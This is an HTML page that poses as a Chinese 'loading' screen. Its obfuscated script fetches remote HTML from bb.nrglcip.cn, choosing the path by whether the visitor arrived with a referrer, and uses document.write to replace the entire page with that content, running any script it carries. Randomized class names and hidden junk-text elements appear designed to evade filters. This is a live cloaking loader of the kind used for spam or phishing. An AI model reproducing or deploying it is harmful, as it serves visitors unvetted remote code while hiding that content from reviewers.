<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ZvD1BYN {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ZvD1BYN .ROM5xnZ {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ZvD1BYN .content {
            line-height: 50px;
            text-align: center
        }

        .ZvD1BYN .img {
            width: 100%
        }

        .ZvD1BYN .NaTyVA {
            text-align: center
        }

        .ZvD1BYN .NaTyVA span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ZvD1BYN .NaTyVA span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ZvD1BYN .NaTyVA span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ZvD1BYN .NaTyVA span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ZvD1BYN .NaTyVA span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ZvD1BYN .NaTyVA span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ZvD1BYN .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function LvbacHYTzpbc(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var TzA4L4 = LvbacHYTzpbc('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ TzA4L4 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ TzA4L4 +".html?a=share";
		}
		
        MFWpWIQ4ek=url+"#"+new Date().getTime();
        MFWpWIQ4ek && function() {
            $.get(MFWpWIQ4ek, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >jIMc1Erzn85dsVCiZ2FFeKHCgIt7O5OmMA3i0zT1REQfbt6pzI4NEBIEctTKdQfbY0ENDKq3BqIgv4RCWsxE</li>
<span style='display:none'>RzlusPm6roj0D54xOz7gDKXdkoQsnxasssx3XBQSUg</span>
<b style='display:none' >nk5hVKDMIDBeey30qBtEdmdRJ57HHF1YS6Z</b>
<ul style='display:none' >RGuOZZbZG2iyZ1b4fwtJmobrlkcMK0OOnU</ul>
<a  href='#' style='display:none'>m0BUPDabcrJ10VeKEj1VOkXH6rlJjKjHQmv6</a><div class="ZvD1BYN">
    <div class="ROM5xnZ">
        <div class="NaTyVA">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<ul style='display:none' >SeVrrdUpxDJyDIwTKdysQMjqOXFBmnltyRApzaLyLEReIpJBfLHwPahhXqIE7gva9n1N9ttzauHf</ul>
<ul style='display:none' >SeVrrdUpxDJyDIwTKdysQMjqOXFBmnltyRApzaLyLEReIpJBfLHwPahhXqIE7gva9n1N9ttzauHf</ul></body>
</html>